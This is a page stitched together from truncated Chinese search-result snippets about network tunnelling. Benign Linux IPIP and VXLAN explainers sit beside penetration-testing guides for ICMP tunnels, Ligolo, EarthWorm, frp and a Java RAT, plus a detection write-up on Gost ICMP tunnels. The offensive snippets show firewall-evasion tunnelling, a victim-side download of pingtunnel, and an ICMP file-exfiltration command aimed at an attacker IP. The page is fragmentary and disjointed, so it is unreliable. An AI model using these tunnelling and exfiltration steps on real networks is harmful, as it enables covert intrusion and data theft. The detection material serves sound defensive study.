# 简介 IPIP隧道是一种点对点的隧道协议,用于在IPv4网络上传输IPv4或IPv6数据包。...IPIP隧道的工作原理是将源主机的IP数据包封装在一个新的IP数据包中,新的IP数据包的目的地址是隧道的另一端。在隧道的另一端,接收方将解封装原始IP数据包,并将其传递到目标主机。...IPIP隧道可以在不同的网络之间建立连接,例如在IPv4网络和IPv6网络之间建立连接。...# 使用IPIP隧道实现跨主机网络 首先在Node1创建tun设备并设置为ipip模式,local设置为本地IP地址10.65.132.187,remote设置为对端IP10.65.132.187,这两个是隧道外层...IP,然后再设置隧道内层IP,10.10.100.10到10.10.200.10。
IP 隧道 Linux 原生支持多种三层隧道,其底层实现原理都是基于 tun 设备。我们可以通过命令 ip tunnel help 查看 IP 隧道的相关操作。...inherit/00..ff } TTL := { 1..255 | inherit } KEY := { DOTTED_QUAD | NUMBER } 可以看到,Linux...实践 IPIP 隧道 我们下面以 ipip 作为例子,来实践下 Linux 的隧道通信。本文以前文的 Linux 路由机制作为基础,不清楚 Linux 路由的可以先翻看下那篇文章再来看。...5、Linux 打开了 ip_forward,相当于一台路由器,10.10.10.0 和 10.10.20.0 是两条直连路由,所以直接查表转发,从 NS1 过渡到 NS2。...总结 现在的 Linux 内核原生支持 5 种隧道协议,它们底层实现都是采用 tun 虚拟设备。 我们熟知的各种 V** 软件,其底层实现都离不开这 5 种隧道协议。
前言:IPIP隧道是一种三层隧道,通过把原来的IP包封装在新的IP包里面,来创建隧道传输。...本篇简单分析Linux(2.6.32版本)中的IPIP隧道的实现过程,期望有所借鉴,造出轮子:-) 一....IPIP的初始化 Linux中的IPIP隧道文件主要分布在tunnel4.c和ipip.c文件中。...因为是三层隧道,在IP报文中填充的三层协议自然就不能是常见的TCP和UDP,所以,Linux抽象了一个隧道层,位置就相当于传输层,主要的实现就是在tunnel4.c中。...可以说在隧道层对隧道协议进行的注册,保证能够识别接收到隧道包。而对隧道包的处理则是在IPIP中完成的。
支持icmp、kcp、quic 支持双向的代理 可以自由进行内部外协议的组合 通过一个工具基本可以满足演练过程中打隧道的要求(可惜不支持dns协议)。...这篇文章主要是自己研究该工具如何使用的过程 0x02 工具简介 支持的协议:tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 支持的类型...在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。...挂代理socks5:vps:8080,查看当前ip为client出口地址,已进入client网络环境 ICMP+cobaltstrike Server 反向代理用于进入目标内网,正向代理可配合远控工具进行上线
写在前面 博文内容为 Linux 隧道通信 IPIP认知 内容涉及:ipip 介绍,一个 ipip 通信 Demo 以及数据帧流转分析 理解不足小伙伴帮忙指正 某些人和事,哪怕没有缘分,是路边的风景,可是只要看一眼...隧道技术。...下面我们以ipip为例,介绍Linux隧道通信的基本原理。...注:Linux L3隧道底层实现原理都基于tun设备 ipip隧道通信 Demo 应为只有一台机器,所以这里我们通过 Linux 上的两个 network namespace 来模拟两个机器节点,每个...ipip隧道网络拓扑如图 这里我们用两个 Linux network namespace 来模拟 ,创建两个网络命名空间,同时配置两个 veth pair,一端放到命名空间 liruilonger@cloudshell
Ligolo Ligolo是一款专为安全测试人员设计的反向隧道工具。...实际上,它是一款实现和使用都非常简单的轻量级工具,可以帮助渗透测试研究人员轻松通过一个反向连接建立一个完全安全的SOCKS5或TCP通信隧道。...功能介绍 1、TLS 1.3隧道,带有TLS绑定; 2、多平台支持,包括Windows、Linux和macOS等; 3、多路复用(1条TCP连接可多路复用); 4、SOCKS5代理或中继; 使用场景 假设你在一次外部安全审计任务过程中...,现在已经成功入侵了一台Windows/Linux/macOS服务器。.../bin/localrelay_linux_amd64 在目标主机中,运行下列命令: > ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
-05-23 这天,有朋友通过公众号留言,询问了我关于 ICMP 隧道的处置方法,但是后来没聊几句这位朋友就没回复了,可能是解决了吧 昨天有看到,一个朋友在朋友圈发布了一款 ICMP 通信工具,还提到演练将至...起初,它的主要应用是在Unix和Linux系统中作为数据包嗅探工具的一部分,比如tcpdump和Wireshark,用来在内核级别过滤网络数据包,从而减少不必要的数据从内核空间传递到用户空间的过程,提升了效率...由于并没有学过相关知识,所以这里使用 bpftrace 来利用 ebpf 帮助我们完成功能,这是一个高级的动态跟踪工具和域特定语言(Domain Specific Language, DSL),专为Linux...使用 pingtunnel 工具来模拟攻击者搭建的 icmp 隧道,服务端(攻击者)地址为 192.168.31.83 1....受害端执行 icmp 隧道客户端 wget https://github.com/esrrhs/pingtunnel/releases/download/2.8/pingtunnel_linux_amd64
1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道,ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping...2、建立 ICMP 隧道工具 用于建立 ICMP 隧道的工具常见有:ptunnel、icmpsh、icmptunnel 等 ptunnel ptunnel 全称 PingTunnel,Kali 下自带该工具...) 目前有这样的一个场景,当前已经拿下了一台外网 Web Linux 服务器,想通过它利用 ICMP 协议连接内网的一台已经开启远程桌面的 Windows ,网络结构简化如下。...git clone https://github.com/inquisb/icmpsh.git #下载工具 apt-get install python-impacket # 安装依赖,或者 pip2...icmptunnel icmptunnel 的优势在于可以穿过状态防火墙或 NAT,同样在 github 上进行下载,值得注意的是该工具只有 Linux 版。
源码与分析 (1)icmp_tran.py (2)tran.sh 2、检测与绕过 (1)异常ICMP数据包数量 (2)异常ICMP包长度 (3)payload内容 结语 前言 本文研究ICMP隧道的一个工具...:内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)服务端 tucpdump监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo.../tran.sh (2)客户端 windows icmp_tran.exe linux sudo python icmp_tran.py <attacker-IP...os.system("certutil -encode "+ file +" test.txt") # windows os.system("base64 "+ file +" > test.txt") # linux...payload内容 payload内容这个还是没办法避免的事情 正常ping命令: windows系统下ping默认传输的是:abcdefghijklmnopqrstuvwabcdefghi,共32bytes linux
写在前面 博文内容为 Linux 网络隧道技术 VXLAN 认知,内容涉及: vxlan 协议介绍 vxlan 基本配置命令 基于Linux 网络命名空间的 vxlan 组网 Demo 自维护 VTEP...VXLAN 的配置管理使用iproute2包,这个工具是和 VXLAN 一起合入内核的,我们常用的 ip 命令就是 iproute2 的客户端工具。...VXLAN 要求 Linux 内核版本在3.7以上,最好为3.9以上,所以在一些旧版本的 Linux 上无法使用基于 VXLAN 的封包技术。...在实际生产中,每台主机上都有几十台甚至上百台虚拟机或者容器需要通信,因此需要找到一种方法将这些通信实体组织起来,再经过隧道口 VTEP 转发出去 Linux 网桥可以连接多块虚拟网卡,因此可以使用网桥把多个虚拟机或者容器放到同一个...借助自动化的工具做到实时的表项(FDB 和 ARP)更新,这种方法能高效实现 overlay 网络的通信。
常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。...PingTunnel是一款常用的ICMP隧道工具,可以跨平台使用,为了避免隧道被滥用,可以为隧道设置密码。...网络环境: 攻击主机(VPS):192.168.188.129 攻击主机(Windows 10):192.168.188.1 内网边界主机(Kali linux):192.168.188.134、...该工具是PingTunnel Go语言版本,同样它也是一款ICMP隧道工具,可以跨平台使用,常用的网络场景如下所示: 工具使用 首先下载PingTunnel对应的安装包 https://github.com...ICMPTunnel是一个使用python编写的简易脚本,该工具主要用于创建一个反向的ICMP隧道用于转发TCP通信数据包,这在内网中有时候也会很有帮助,且该工具具有一定的免杀效果~ 工具使用 首先去
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...EW是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可以在复杂的网络环境下完成网络穿透。...该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,现在使用人数较多,如果在真实环境下使用,需要免杀 下载地址:https://github.com/idlefire/ew...该工具共有6种命令格式(ssocksd、rcsocks、rssocks、lcx_listen、lcx_tran) -l 本地要监听的端口 -f 要主动连接的ip -g 要主动连接的端口 -d 要反弹到的...多级级联 工具中自带的三条端口转发指令, 它们的参数格式分别为: $ ./ew -s lcx_listen -l 1080 -e 8888 $ .
启动命令: Windows:frpc.exe -c frpc.ini Linux:./frpc -c ./frpc.ini ....工具使用 「这里linux是公网VPS,作为服务端 windows是内网服务器,作为客户端」 在linux中解压命令: tar zxvf frp_0.37.0_linux_amd64.tar.gz...local_port = 80 #本地端口(根据协议修改) remote_port = 6001 #远程服务器的ip端口 一台Windows和一台Linux建立隧道连接 server_addr = 102.224.185.237...首先在外网vps上启动frps服务,在内网的web服务器与域控之间建立一条frps隧道,内网web服务器启动frps,域控启动frpc服务,相互连接,建立起一条一级代理隧道,此时web服务器就作为跳板了...利用处于内网或防火墙后的机器,对外网环境提供TCP和UDP服务,例如在家里通过SSH访问处于公司内网环境的主机 对于其它穿透隧道工具的不足: Earthworm不能过杀软,秒杀 Tunnel非常不稳定,
1.概述 近期,观成科技安全研究团队在现网中检测到了利用Gost工具实现加密隧道的攻击行为。Gost是一款支持多种协议的隧道工具,使用go语言编写。...该工具实现了多种协议的隧道通信方法,例如TCP/UDP协议,Websocket,HTTP/2,QUIC,TLS等。 2022年11月,Gost更新了V3新版本,在新版本中新增了ICMP隧道功能。...图6 数据包长度特征 3.产品检测 观成瞰云(ENS)-加密威胁智能检测系统能够对GOST工具产生的ICMP隐蔽隧道流量进行检测。...4.总结 利用Gost工具搭建ICMP隧道,攻击者可以将攻击流量隐藏在隧道之中,从而规避流量监测设备,大幅度降低被发现的可能性。...目前,越来越多的攻击者利用ICMP、DNS等协议来实现隐蔽隧道加密通信,我们将会保持对此类工具的密切跟踪和研究。
该隧道由中间的“代理服务器”创建,通常部署于“DMZ”区域。 在隧道中可以传输一些被限制的协议,最终借由“代理服务器”跳出受限网络。.../1.1 200告诉“客户端”隧道已经建立 “客户端”发送TCP之上(包括SSL)的数据给“代理”,再经由“代理”转发给“服务器”。...# 以下来自服务器的数据 HTTP/1.1 200 OK ... ---- 非CONNECT方法建立HTTP隧道 建立HTTP隧道可以是任何方法,它只是一种思想,而CONNECT是最为常见的方式而已...建立HTTP隧道的场景中,“客户端”部署在保护(受限)网络的内部,而“代理”则部署在外部。...---- 代理认证 这里的“代理认证“指的是”代理“对”客户端“进行身份认证,认证通过后才允许建立HTTP隧道。
简介 Lucian(中文名卢锡安)是一款开源的跨平台网站管理工具 不同于市面上其他远控工具,虽然支持各项协议的远控如dns、https、tcp、smtp层出不穷,但是一、各种对Cobra Strike...,无需cc服务器,保护安全测试人员 适配国内外主流云厂家的应用场景,已经实现的功能有: 支持windows、linux、mac系统,只要系统上有jdk1.6到jdk12均可运行 支持多种对象存储协议:亚马逊...java和class文件均已删除 Q&A 问:这个工具和蚁剑、冰蝎,哥斯拉有什么区别?...答:这不是一个webshell管理工具,是用java写的rat,提供了一种新的中转通道思路,本质还是基于http的。 问:需要目标系统什么环境,一定要安装jdk吗?...答:工具主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担并将追究其相关责任!
但,此时可借助于 ssh 隧道,将服务器端口号映射到宿主机本地,则可以愉快地将服务器作为开发环境了。
这里推荐一个既不用下载软件,又不需要注册账号的免费内网穿透工具:localhost.run。 ...工具官网:http://localhost.run/docs/ 根据官网描述,只需要一行命令,就可以跑起来了: ssh -R 80:localhost:8080 localhost.run
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道...在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到...使用ICMP搭建隧道(PingTunnel) PingTunnel是一款常用的ICMP隧道工具,可以跨平台使用,为了避免隧道被滥用,还可以为隧道设置密码。...使用ICMP搭建隧道(Icmptunnel) 适用场景:目标机器是Linux服务器的情况 攻击机:Redhat7 192.1.68.10.20 靶机:Centos7 192.168.10.13 ICMP...icmptunnel是一个将IP流量封装到 ICMP echo请求和回复(ping)包中的隧道工具,是在允许 ping 的网络中进行拓展、绕过防火墙的一种半隐蔽方式。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
